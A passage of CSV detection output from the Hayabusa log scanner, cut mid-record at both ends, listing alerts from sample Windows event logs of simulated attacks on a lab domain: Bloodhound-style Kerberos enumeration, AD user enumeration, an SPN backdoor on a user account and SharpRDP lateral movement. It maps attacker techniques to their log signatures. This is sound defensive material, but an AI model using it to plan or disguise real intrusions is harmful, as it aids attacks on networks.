Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
+2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 
0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 
0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 
0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 
07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
